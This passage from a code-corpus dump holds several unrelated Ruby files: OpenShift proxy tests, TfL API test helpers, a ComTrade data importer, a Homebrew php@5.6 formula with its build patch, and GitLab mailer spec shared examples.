# limitations under the License.
#++
#
# Test the OpenShift frontend_proxy model
#
module OpenShift; end
require 'openshift-origin-node/model/frontend_proxy'
require 'test/unit'
require 'fileutils'
require 'mocha'
# Run unit test manually
# ruby -I node/lib:common/lib node/test/unit/frontend_proxy_test.rb
class TestFrontendProxy < Test::Unit::TestCase
def setup
config = mock('OpenShift::Config')
@ports_begin = 35531
@ports_per_user = 5
@uid_begin = 500
config.stubs(:get).with("PORT_BEGIN").returns(@ports_begin.to_s)
config.stubs(:get).with("PORTS_PER_USER").returns(@ports_per_user.to_s)
config.stubs(:get).with("UID_BEGIN").returns(@uid_begin.to_s)
OpenShift::Config.stubs(:new).returns(config)
end
# Simple test to validate the port range computation given
# a certain UID.
def test_port_range
proxy = OpenShift::FrontendProxyServer.new
range = proxy.port_range(500)
assert_equal range.begin, @ports_begin
assert_equal range.end, (@ports_begin + @ports_per_user)
end
# Verify a valid mapping request is mapped to a port.
def test_valid_add
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns(nil).once
proxy.expects(:system_proxy_set).returns(['', '', 0]).once
mapped_port = proxy.add(uid, '127.0.0.1', 8080)
assert_equal 35531, mapped_port
end
# When adding the same mapping twice, the existing port mapping
# should be returned immediately.
def test_valid_add_twice
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns(nil).once
proxy.expects(:system_proxy_set).returns(['', '', 0]).once
mapped_port = proxy.add(uid, '127.0.0.1', 8080)
assert_equal 35531, mapped_port
proxy.expects(:system_proxy_show).returns("127.0.0.1:8080").once
mapped_port = proxy.add(uid, '127.0.0.1', 8080)
assert_equal 35531, mapped_port
end
# Ensures that a non-zero return code from a system proxy set
# attempt during an add operation raises an exception.
def test_add_system_error
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns(nil).once
proxy.expects(:system_proxy_set).returns(['Stdout', 'Stderr', 1]).once
assert_raises OpenShift::FrontendProxyServerException do
proxy.add(uid, '127.0.0.1', 8080)
end
end
# Verifies that an exception is thrown if all ports in the given
# UID's range are already mapped to an address.
def test_out_of_ports_during_add
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns("127.0.0.1:9000").times(@ports_per_user)
proxy.expects(:system_proxy_set).never
assert_raises OpenShift::FrontendProxyServerException do
proxy.add(uid, '127.0.0.1', 8080)
end
end
# Verifies that a successful system proxy delete is executed for
# an existing mapping.
def test_delete_success
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).with(35531).returns("127.0.0.1:8080").once
proxy.expects(:system_proxy_delete).with(35531).returns(['', '', 0]).once
proxy.delete(uid, "127.0.0.1", 8080)
end
# Ensures that no system proxy delete is attempted when no mapping
# to the requested address is found.
def test_delete_nonexistent
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).returns(nil).at_least_once
proxy.expects(:system_proxy_delete).never
proxy.delete(uid, "127.0.0.1", 8080)
end
# Verifies an exception is raised when a valid delete attempt to the
# system proxy returns a non-zero exit code.
def test_delete_failure
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_show).with(35531).returns("127.0.0.1:8080").once
proxy.expects(:system_proxy_delete).with(35531).returns(['Stdout', 'Stderr', 1]).once
assert_raises OpenShift::FrontendProxyServerException do
proxy.delete(uid, "127.0.0.1", 8080)
end
end
# Tests that a successful delete of all proxy mappings for the UID
# results in a batch of 5 ports being sent to the system proxy command.
def test_delete_all_success
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_delete).with(anything, anything, anything, anything, anything).returns(['', '', 0]).once
proxy.delete_all_for_uid(uid, false)
end
  # Ensures that a non-zero response from the system proxy delete call,
  # when the ignore-errors flag is disabled, results in an exception bubbling up.
def test_delete_all_ignore
proxy = OpenShift::FrontendProxyServer.new
uid = 500
proxy.expects(:system_proxy_delete).with(anything, anything, anything, anything, anything).returns(['Stdout', 'Stderr', 1]).once
assert_raises OpenShift::FrontendProxyServerException do
proxy.delete_all_for_uid(uid, false)
end
end
# Verify the command line constructed by the system proxy delete
# given a variety of arguments.
def test_system_proxy_delete
proxy = OpenShift::FrontendProxyServer.new
proxy.expects(:shellCmd).with(equals("openshift-port-proxy-cfg setproxy 1 delete")).once
proxy.system_proxy_delete(1)
proxy.expects(:shellCmd).with(equals("openshift-port-proxy-cfg setproxy 1 delete 2 delete 3 delete")).once
proxy.system_proxy_delete(1, 2, 3)
end
# Verify the command line constructed by the system proxy add command
# given a variety of arguments.
def test_system_proxy_add
proxy = OpenShift::FrontendProxyServer.new
proxy.expects(:shellCmd).with(equals('openshift-port-proxy-cfg setproxy 3000 "127.0.0.1:1000"')).once
proxy.system_proxy_set({:proxy_port => 3000, :addr => '127.0.0.1:1000'})
proxy.expects(:shellCmd)
.with(equals('openshift-port-proxy-cfg setproxy 3000 "127.0.0.1:1000" 3001 "127.0.0.1:1001" 3002 "127.0.0.1:1002"'))
.once
proxy.system_proxy_set(
{:proxy_port => 3000, :addr => '127.0.0.1:1000'},
{:proxy_port => 3001, :addr => '127.0.0.1:1001'},
{:proxy_port => 3002, :addr => '127.0.0.1:1002'}
)
end
end
| 31.597222 | 132 | 0.717509 |
f7b53b722b4380b7e1803be4622ff85a73346ccb | 80 | module Merb
module StaticPagesHelper
end # StaticPagesHelper
end # Merb | 16 | 26 | 0.75 |
87ae9ca7d274980fb0fc3d5818fcb22b72c229f1 | 3,458 | #
# Copyright (c) 2015 - 2018 Luke Hackett
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
require 'uri'
module Helpers
# Returns a new instance of the TflApi::Client class using authorised details.
# All calls to the API using this object should return the expected data.
#
# @return [TflApi::Client] A TflApi::Client instance created with valid credentials
#
def authorised_client
# Fail early if the Application private and public keys are not set
fail 'Please set your app id via the TFL_APP_ID environment variable' unless ENV['TFL_APP_ID']
fail 'Please set your app key via the TFL_APP_KEY environment variable' unless ENV['TFL_APP_KEY']
TflApi::Client.new(app_id: ENV['TFL_APP_ID'], app_key: ENV['TFL_APP_KEY'], log_location: '/dev/null')
end
# Returns a new instance of the TflApi::Client class using unauthorised details.
# All calls to the API using this object should result in unauthorised access
# errors from the TFL API.
#
# @return [TflApi::Client] A TflApi::Client instance created with invalid credentials
#
def unauthorised_client
TflApi::Client.new(app_id: 123, app_key: 456, log_location: '/dev/null')
end
# Returns a new instance of the TflApi::Client class using test details.
# This client should only be used within Unit Tests, as the host has been
# fixed to a dummy value.
#
# @return [TflApi::Client] A TflApi::Client instance created with invalid credentials
#
def test_client
TflApi::Client.new(app_id: 12345, app_key: 6789, host: 'https://somehost', log_location: '/dev/null')
end
  # Stubs an HTTP request of the given method against the given resource.
  # Optional params can be given to be appended to the URL, whilst to_return
  # allows specific response information to be set.
#
# @param method [Symbol] The type of stub request, e.g. :get, :post etc
# @param resource [String] The resource path to stub
# @param to_return [Hash] Response to return upon issuing the request
#
# @option params [Hash] A hash of URL params to add to the URI
#
# @return [WebMock::RequestStub] A WebMock::RequestStub instance
#
def stub_api_request(method, resource, params={}, to_return)
params_string = URI.encode_www_form(params)
uri = URI.parse("https://somehost/#{resource}?#{params_string}&app_id=12345&app_key=6789")
stub_request(method.to_sym, uri).to_return(to_return)
end
end | 42.691358 | 105 | 0.744361 |
280d295e26046ba675d05dd83e63989f609f8cd4 | 113 | module AthenaHealth
class PatientCollection < BaseCollection
attribute :patients, Array[Patient]
end
end
| 18.833333 | 42 | 0.787611 |
7a2c9ed5e8bca277864d8f57f8e227d0a33c85e0 | 3,378 | module Api
module V3
module CountriesComTradeIndicators
class ComTradeRequest
class ComTradeError < StandardError; end
RG_TO_ACTIVITY = {
1 => 'importer',
2 => 'exporter'
}
def initialize(uri)
@uri = URI(uri)
end
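        # Fetches the ComTrade endpoint, validates the payload, and persists one CountriesComTradeIndicator per dataset element.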
def call
response = Net::HTTP.get_response(@uri)
if response.code != '200'
error = ComTradeError.new(response)
Rails.logger.error error
Appsignal.send_error(error)
return
end
body = response.body
data = JSON.parse(body)
ensure_valid_response(data['validation']) or return
data['dataset'].each do |element|
attributes = parse_attributes(element)
next unless attributes
Api::V3::CountriesComTradeIndicator.create!(
attributes.merge(updated_at: Time.now)
)
end
end
private
def ensure_valid_response(validation)
status = validation['status']
if status['name'] != 'Ok'
error = ComTradeError.new(
validation['message'] + ' (' +
status['name'] + ' ' +
status['description'] + ')'
)
Rails.logger.error error
Appsignal.send_error(error)
return false
end
true
end
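        # Maps one ComTrade dataset element to indicator attributes; returns nil for rows to skip (unknown commodity or country, country groupings, re-exports/re-imports).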
def parse_attributes(element)
commodity_code = element['cmdCode']
commodity = commodity_codes.lookup_by_com_trade_code(commodity_code)
unless commodity
error = ComTradeError.new(
"Unknown commodity #{commodity_code}" +
element.inspect
)
Rails.logger.error error
Appsignal.send_error(error)
return nil
end
iso3 = element['rt3ISO']
return nil if iso3.blank? # ignore, e.g. country groupings
country = country_codes.lookup_by_iso3(iso3)
unless country
error = ComTradeError.new(
"Unknown country #{iso3}" +
element.inspect
)
Rails.logger.error error
Appsignal.send_error(error)
return nil
end
raw_quantity = element['TradeQuantity']
eq_factor = commodity[:eq_factor] || 1
quantity = raw_quantity && raw_quantity * eq_factor
activity = RG_TO_ACTIVITY[element['rgCode']]
return nil if activity.nil? # ignore, e.g. re-export / re-import
{
raw_quantity: raw_quantity,
quantity: quantity,
value: element['TradeValue'],
commodity_id: commodity[:trase_id],
year: element['yr'],
iso3: iso3,
iso2: country[:iso2],
commodity_code: commodity_code,
activity: activity
}
end
def commodity_codes
return @commodity_codes if defined? @commodity_codes
@commodity_codes =
Api::V3::CountriesComTradeIndicators::CommodityCodes.new
end
def country_codes
return @country_codes if defined? @country_codes
@country_codes =
Api::V3::CountriesComTradeIndicators::CountryCodes.new
end
end
end
end
end
| 28.627119 | 78 | 0.541741 |
91825fc124a350d4ad40ce25d37a0ea1af2022cf | 16,867 | class PhpAT56 < Formula
desc "General-purpose scripting language"
homepage "https://secure.php.net/"
url "https://php.net/get/php-5.6.38.tar.xz/from/this/mirror"
sha256 "c2fac47dc6316bd230f0ea91d8a5498af122fb6a3eb43f796c9ea5f59b04aa1e"
revision 2
bottle do
sha256 "a4d5ae99450c84af82dd65248d78981f34251f0759189f0adf1b3d2b76757b08" => :mojave
sha256 "dd5ada4d0c391a3b4136b67f3b2349cf920e6f49c41d898dfe257bf459a9972e" => :high_sierra
sha256 "4c72e8efc0cd575d30c8675c4641677eb3466db3acb14dc28a4ac4c7ad40de6b" => :sierra
end
keg_only :versioned_formula
depends_on "httpd" => [:build, :test]
depends_on "pkg-config" => :build
depends_on "apr"
depends_on "apr-util"
depends_on "aspell"
depends_on "autoconf"
depends_on "curl-openssl"
depends_on "freetds"
depends_on "freetype"
depends_on "gettext"
depends_on "glib"
depends_on "gmp"
depends_on "icu4c"
depends_on "jpeg"
depends_on "libpng"
depends_on "libpq"
depends_on "libtool"
depends_on "libzip"
depends_on "mcrypt"
depends_on "openldap"
depends_on "openssl"
depends_on "pcre"
depends_on "sqlite"
depends_on "tidy-html5"
depends_on "unixodbc"
# PHP build system incorrectly links system libraries
# see https://github.com/php/php-src/pull/3472
patch :DATA
needs :cxx11
def install
# Ensure that libxml2 will be detected correctly in older MacOS
if MacOS.version == :el_capitan || MacOS.version == :sierra
ENV["SDKROOT"] = MacOS.sdk_path
end
# buildconf required due to system library linking bug patch
system "./buildconf", "--force"
inreplace "configure" do |s|
s.gsub! "APACHE_THREADED_MPM=`$APXS_HTTPD -V | grep 'threaded:.*yes'`",
"APACHE_THREADED_MPM="
s.gsub! "APXS_LIBEXECDIR='$(INSTALL_ROOT)'`$APXS -q LIBEXECDIR`",
"APXS_LIBEXECDIR='$(INSTALL_ROOT)#{lib}/httpd/modules'"
s.gsub! "-z `$APXS -q SYSCONFDIR`",
"-z ''"
# apxs will interpolate the @ in the versioned prefix: https://bz.apache.org/bugzilla/show_bug.cgi?id=61944
s.gsub! "LIBEXECDIR='$APXS_LIBEXECDIR'",
"LIBEXECDIR='" + "#{lib}/httpd/modules".gsub("@", "\\@") + "'"
end
# Update error message in apache sapi to better explain the requirements
# of using Apache http in combination with php if the non-compatible MPM
# has been selected. Homebrew has chosen not to support being able to
# compile a thread safe version of PHP and therefore it is not
# possible to recompile as suggested in the original message
inreplace "sapi/apache2handler/sapi_apache2.c",
"You need to recompile PHP.",
"Homebrew PHP does not support a thread-safe php binary. "\
"To use the PHP apache sapi please change "\
"your httpd config to use the prefork MPM"
inreplace "sapi/fpm/php-fpm.conf.in", ";daemonize = yes", "daemonize = no"
# API compatibility with tidy-html5 v5.0.0 - https://github.com/htacg/tidy-html5/issues/224
inreplace "ext/tidy/tidy.c", "buffio.h", "tidybuffio.h"
# Required due to icu4c dependency
ENV.cxx11
  # icu4c 61.1 compatibility
ENV.append "CPPFLAGS", "-DU_USING_ICU_NAMESPACE=1"
config_path = etc/"php/#{php_version}"
# Prevent system pear config from inhibiting pear install
(config_path/"pear.conf").delete if (config_path/"pear.conf").exist?
  # Prevent homebrew from hardcoding the path to the sed shim in the phpize script
ENV["lt_cv_path_SED"] = "sed"
# Each extension that is built on Mojave needs a direct reference to the
# sdk path or it won't find the headers
headers_path = "=#{MacOS.sdk_path_if_needed}/usr"
args = %W[
--prefix=#{prefix}
--localstatedir=#{var}
--sysconfdir=#{config_path}
--with-config-file-path=#{config_path}
--with-config-file-scan-dir=#{config_path}/conf.d
--with-pear=#{pkgshare}/pear
--enable-bcmath
--enable-calendar
--enable-dba
--enable-exif
--enable-ftp
--enable-fpm
--enable-intl
--enable-mbregex
--enable-mbstring
--enable-mysqlnd
--enable-pcntl
--enable-phpdbg
--enable-shmop
--enable-soap
--enable-sockets
--enable-sysvmsg
--enable-sysvsem
--enable-sysvshm
--enable-wddx
--enable-zip
--with-apxs2=#{Formula["httpd"].opt_bin}/apxs
--with-bz2#{headers_path}
--with-curl=#{Formula["curl-openssl"].opt_prefix}
--with-fpm-user=_www
--with-fpm-group=_www
--with-freetype-dir=#{Formula["freetype"].opt_prefix}
--with-gd
--with-gettext=#{Formula["gettext"].opt_prefix}
--with-gmp=#{Formula["gmp"].opt_prefix}
--with-iconv#{headers_path}
--with-icu-dir=#{Formula["icu4c"].opt_prefix}
--with-jpeg-dir=#{Formula["jpeg"].opt_prefix}
--with-kerberos#{headers_path}
--with-layout=GNU
--with-ldap=#{Formula["openldap"].opt_prefix}
--with-ldap-sasl#{headers_path}
--with-libedit#{headers_path}
--with-libxml-dir#{headers_path}
--with-libzip
--with-mcrypt=#{Formula["mcrypt"].opt_prefix}
--with-mhash#{headers_path}
--with-mysql-sock=/tmp/mysql.sock
--with-mysqli=mysqlnd
--with-mysql=mysqlnd
--with-ndbm#{headers_path}
--with-openssl=#{Formula["openssl"].opt_prefix}
--with-pdo-dblib=#{Formula["freetds"].opt_prefix}
--with-pdo-mysql=mysqlnd
--with-pdo-odbc=unixODBC,#{Formula["unixodbc"].opt_prefix}
--with-pdo-pgsql=#{Formula["libpq"].opt_prefix}
--with-pdo-sqlite=#{Formula["sqlite"].opt_prefix}
--with-pgsql=#{Formula["libpq"].opt_prefix}
--with-pic
--with-png-dir=#{Formula["libpng"].opt_prefix}
--with-pspell=#{Formula["aspell"].opt_prefix}
--with-sqlite3=#{Formula["sqlite"].opt_prefix}
--with-tidy=#{Formula["tidy-html5"].opt_prefix}
--with-unixODBC=#{Formula["unixodbc"].opt_prefix}
--with-xmlrpc
--with-xsl#{headers_path}
--with-zlib#{headers_path}
]
system "./configure", *args
system "make"
system "make", "install"
# Allow pecl to install outside of Cellar
extension_dir = Utils.popen_read("#{bin}/php-config --extension-dir").chomp
orig_ext_dir = File.basename(extension_dir)
inreplace bin/"php-config", lib/"php", prefix/"pecl"
inreplace "php.ini-development", %r{; ?extension_dir = "\./"},
"extension_dir = \"#{HOMEBREW_PREFIX}/lib/php/pecl/#{orig_ext_dir}\""
config_files = {
"php.ini-development" => "php.ini",
"sapi/fpm/php-fpm.conf" => "php-fpm.conf",
}
config_files.each_value do |dst|
dst_default = config_path/"#{dst}.default"
rm dst_default if dst_default.exist?
end
config_path.install config_files
unless (var/"log/php-fpm.log").exist?
(var/"log").mkpath
touch var/"log/php-fpm.log"
end
end
def post_install
pear_prefix = pkgshare/"pear"
pear_files = %W[
#{pear_prefix}/.depdblock
#{pear_prefix}/.filemap
#{pear_prefix}/.depdb
#{pear_prefix}/.lock
]
%W[
#{pear_prefix}/.channels
#{pear_prefix}/.channels/.alias
].each do |f|
chmod 0755, f
pear_files.concat(Dir["#{f}/*"])
end
chmod 0644, pear_files
# Custom location for extensions installed via pecl
pecl_path = HOMEBREW_PREFIX/"lib/php/pecl"
ln_s pecl_path, prefix/"pecl" unless (prefix/"pecl").exist?
extension_dir = Utils.popen_read("#{bin}/php-config --extension-dir").chomp
php_basename = File.basename(extension_dir)
php_ext_dir = opt_prefix/"lib/php"/php_basename
# fix pear config to install outside cellar
pear_path = HOMEBREW_PREFIX/"share/pear@#{php_version}"
cp_r pkgshare/"pear/.", pear_path
{
"php_ini" => etc/"php/#{php_version}/php.ini",
"php_dir" => pear_path,
"doc_dir" => pear_path/"doc",
"ext_dir" => pecl_path/php_basename,
"bin_dir" => opt_bin,
"data_dir" => pear_path/"data",
"cfg_dir" => pear_path/"cfg",
"www_dir" => pear_path/"htdocs",
"man_dir" => HOMEBREW_PREFIX/"share/man",
"test_dir" => pear_path/"test",
"php_bin" => opt_bin/"php",
}.each do |key, value|
value.mkpath if key =~ /(?<!bin|man)_dir$/
system bin/"pear", "config-set", key, value, "system"
end
system bin/"pear", "update-channels"
%w[
opcache
].each do |e|
ext_config_path = etc/"php/#{php_version}/conf.d/ext-#{e}.ini"
extension_type = (e == "opcache") ? "zend_extension" : "extension"
if ext_config_path.exist?
inreplace ext_config_path,
/#{extension_type}=.*$/, "#{extension_type}=#{php_ext_dir}/#{e}.so"
else
ext_config_path.write <<~EOS
[#{e}]
#{extension_type}="#{php_ext_dir}/#{e}.so"
EOS
end
end
end
def caveats
<<~EOS
To enable PHP in Apache add the following to httpd.conf and restart Apache:
LoadModule php5_module #{opt_lib}/httpd/modules/libphp5.so
<FilesMatch \\.php$>
SetHandler application/x-httpd-php
</FilesMatch>
Finally, check DirectoryIndex includes index.php
DirectoryIndex index.php index.html
The php.ini and php-fpm.ini file can be found in:
#{etc}/php/#{php_version}/
EOS
end
def php_version
version.to_s.split(".")[0..1].join(".")
end
plist_options :manual => "php-fpm"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_sbin}/php-fpm</string>
<string>--nodaemonize</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
<key>StandardErrorPath</key>
<string>#{var}/log/php-fpm.log</string>
</dict>
</plist>
EOS
end
test do
assert_match /^Zend OPcache$/, shell_output("#{bin}/php -i"),
"Zend OPCache extension not loaded"
# Test related to libxml2 and
# https://github.com/Homebrew/homebrew-core/issues/28398
assert_includes MachO::Tools.dylibs("#{bin}/php"),
"#{Formula["libpq"].opt_lib}/libpq.5.dylib"
system "#{sbin}/php-fpm", "-t"
system "#{bin}/phpdbg", "-V"
system "#{bin}/php-cgi", "-m"
    # Prevent the SNMP extension from being added
assert_no_match /^snmp$/, shell_output("#{bin}/php -m"),
"SNMP extension doesn't work reliably with Homebrew on High Sierra"
begin
require "socket"
server = TCPServer.new(0)
port = server.addr[1]
server_fpm = TCPServer.new(0)
port_fpm = server_fpm.addr[1]
server.close
server_fpm.close
expected_output = /^Hello world!$/
(testpath/"index.php").write <<~EOS
<?php
echo 'Hello world!' . PHP_EOL;
var_dump(ldap_connect());
EOS
main_config = <<~EOS
Listen #{port}
ServerName localhost:#{port}
DocumentRoot "#{testpath}"
ErrorLog "#{testpath}/httpd-error.log"
ServerRoot "#{Formula["httpd"].opt_prefix}"
PidFile "#{testpath}/httpd.pid"
LoadModule authz_core_module lib/httpd/modules/mod_authz_core.so
LoadModule unixd_module lib/httpd/modules/mod_unixd.so
LoadModule dir_module lib/httpd/modules/mod_dir.so
DirectoryIndex index.php
EOS
(testpath/"httpd.conf").write <<~EOS
#{main_config}
LoadModule mpm_prefork_module lib/httpd/modules/mod_mpm_prefork.so
LoadModule php5_module #{lib}/httpd/modules/libphp5.so
<FilesMatch \\.(php|phar)$>
SetHandler application/x-httpd-php
</FilesMatch>
EOS
(testpath/"fpm.conf").write <<~EOS
[global]
daemonize=no
[www]
listen = 127.0.0.1:#{port_fpm}
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
EOS
(testpath/"httpd-fpm.conf").write <<~EOS
#{main_config}
LoadModule mpm_event_module lib/httpd/modules/mod_mpm_event.so
LoadModule proxy_module lib/httpd/modules/mod_proxy.so
LoadModule proxy_fcgi_module lib/httpd/modules/mod_proxy_fcgi.so
<FilesMatch \\.(php|phar)$>
SetHandler "proxy:fcgi://127.0.0.1:#{port_fpm}"
</FilesMatch>
EOS
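      # Boot httpd in the foreground (-X) with the mod_php config first, then repeat below with the FPM proxy config.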
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
Process.kill("TERM", pid)
Process.wait(pid)
fpm_pid = fork do
exec sbin/"php-fpm", "-y", "fpm.conf"
end
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd-fpm.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
ensure
if pid
Process.kill("TERM", pid)
Process.wait(pid)
end
if fpm_pid
Process.kill("TERM", fpm_pid)
Process.wait(fpm_pid)
end
end
end
end
__END__
diff --git a/acinclude.m4 b/acinclude.m4
index 168c465f8d..6c087d152f 100644
--- a/acinclude.m4
+++ b/acinclude.m4
@@ -441,7 +441,11 @@ dnl
dnl Adds a path to linkpath/runpath (LDFLAGS)
dnl
AC_DEFUN([PHP_ADD_LIBPATH],[
- if test "$1" != "/usr/$PHP_LIBDIR" && test "$1" != "/usr/lib"; then
+ case "$1" in
+ "/usr/$PHP_LIBDIR"|"/usr/lib"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/lib[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/lib[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
ifelse([$2],,[
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
@@ -452,8 +456,8 @@ AC_DEFUN([PHP_ADD_LIBPATH],[
else
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl
@@ -487,7 +491,11 @@ dnl add an include path.
dnl if before is 1, add in the beginning of INCLUDES.
dnl
AC_DEFUN([PHP_ADD_INCLUDE],[
- if test "$1" != "/usr/include"; then
+ case "$1" in
+ "/usr/include"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/include[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/include[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
PHP_RUN_ONCE(INCLUDEPATH, $ai_p, [
if test "$2"; then
@@ -495,8 +503,8 @@ AC_DEFUN([PHP_ADD_INCLUDE],[
else
INCLUDES="$INCLUDES -I$ai_p"
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl internal, don't use
@@ -2411,7 +2419,8 @@ AC_DEFUN([PHP_SETUP_ICONV], [
fi
if test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.a ||
- test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME ||
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.tbd
then
PHP_CHECK_LIBRARY($iconv_lib_name, libiconv, [
found_iconv=yes
diff --git a/Zend/zend_compile.h b/Zend/zend_compile.h
index a0955e34fe..09b4984f90 100644
--- a/Zend/zend_compile.h
+++ b/Zend/zend_compile.h
@@ -414,9 +414,6 @@ struct _zend_execute_data {
#define EX(element) execute_data.element
-#define EX_TMP_VAR(ex, n) ((temp_variable*)(((char*)(ex)) + ((int)(n))))
-#define EX_TMP_VAR_NUM(ex, n) (EX_TMP_VAR(ex, 0) - (1 + (n)))
-
#define EX_CV_NUM(ex, n) (((zval***)(((char*)(ex))+ZEND_MM_ALIGNED_SIZE(sizeof(zend_execute_data))))+(n))
diff --git a/Zend/zend_execute.h b/Zend/zend_execute.h
index a7af67bc13..ae71a5c73f 100644
--- a/Zend/zend_execute.h
+++ b/Zend/zend_execute.h
@@ -71,6 +71,15 @@ ZEND_API int zend_eval_stringl_ex(char *str, int str_len, zval *retval_ptr, char
ZEND_API char * zend_verify_arg_class_kind(const zend_arg_info *cur_arg_info, ulong fetch_type, const char **class_name, zend_class_entry **pce TSRMLS_DC);
ZEND_API int zend_verify_arg_error(int error_type, const zend_function *zf, zend_uint arg_num, const char *need_msg, const char *need_kind, const char *given_msg, const char *given_kind TSRMLS_DC);
+static zend_always_inline temp_variable *EX_TMP_VAR(void *ex, int n)
+{
+ return (temp_variable *)((zend_uintptr_t)ex + n);
+}
+static inline temp_variable *EX_TMP_VAR_NUM(void *ex, int n)
+{
+ return (temp_variable *)((zend_uintptr_t)ex - (1 + n) * sizeof(temp_variable));
+}
+
static zend_always_inline void i_zval_ptr_dtor(zval *zval_ptr ZEND_FILE_LINE_DC TSRMLS_DC)
{
if (!Z_DELREF_P(zval_ptr)) {
| 32.815175 | 198 | 0.63479 |
0143bf693c7d327aed98b375754b9e584cdf12ea | 10,583 | # frozen_string_literal: true
RSpec.shared_examples 'a multiple recipients email' do
it 'is sent to the given recipient' do
is_expected.to deliver_to recipient.notification_email
end
end
RSpec.shared_examples 'an email sent from GitLab' do
it 'has the characteristics of an email sent from GitLab' do
sender = subject.header[:from].addrs[0]
reply_to = subject.header[:reply_to].addresses
aggregate_failures do
expect(sender.display_name).to eq(gitlab_sender_display_name)
expect(sender.address).to eq(gitlab_sender)
expect(reply_to).to eq([gitlab_sender_reply_to])
end
end
end
RSpec.shared_examples 'an email sent to a user' do
it 'is sent to user\'s global notification email address' do
expect(subject).to deliver_to(recipient.notification_email)
end
context 'with group notification email' do
it 'is sent to user\'s group notification email' do
group_notification_email = '[email protected]'
create(:email, :confirmed, user: recipient, email: group_notification_email)
create(:notification_setting, user: recipient, source: group, notification_email: group_notification_email)
expect(subject).to deliver_to(group_notification_email)
end
end
end
RSpec.shared_examples 'an email that contains a header with author username' do
it 'has X-GitLab-Author header containing author\'s username' do
is_expected.to have_header 'X-GitLab-Author', user.username
end
end
RSpec.shared_examples 'an email with X-GitLab headers containing IDs' do
it 'has X-GitLab-*-ID header' do
is_expected.to have_header "X-GitLab-#{model.class.name}-ID", "#{model.id}"
end
it 'has X-GitLab-*-IID header if model has iid defined' do
if model.respond_to?(:iid)
is_expected.to have_header "X-GitLab-#{model.class.name}-IID", "#{model.iid}"
else
expect(subject.header["X-GitLab-#{model.class.name}-IID"]).to eq nil
end
end
end
RSpec.shared_examples 'an email with X-GitLab headers containing project details' do
it 'has X-GitLab-Project headers' do
aggregate_failures do
full_path_as_domain = "#{project.name}.#{project.namespace.path}"
is_expected.to have_header('X-GitLab-Project', /#{project.name}/)
is_expected.to have_header('X-GitLab-Project-Id', /#{project.id}/)
is_expected.to have_header('X-GitLab-Project-Path', /#{project.full_path}/)
is_expected.to have_header('List-Id', "#{project.full_path} <#{project.id}.#{full_path_as_domain}.#{Gitlab.config.gitlab.host}>")
end
end
end
RSpec.shared_examples 'a new thread email with reply-by-email enabled' do
it 'has the characteristics of a threaded email' do
host = Gitlab.config.gitlab.host
route_key = "#{model.class.model_name.singular_route_key}_#{model.id}"
aggregate_failures do
is_expected.to have_header('Message-ID', "<#{route_key}@#{host}>")
is_expected.to have_header('References', /\A<reply\-.*@#{host}>\Z/ )
end
end
end
RSpec.shared_examples 'a thread answer email with reply-by-email enabled' do
include_examples 'an email with X-GitLab headers containing project details'
include_examples 'an email with X-GitLab headers containing IDs'
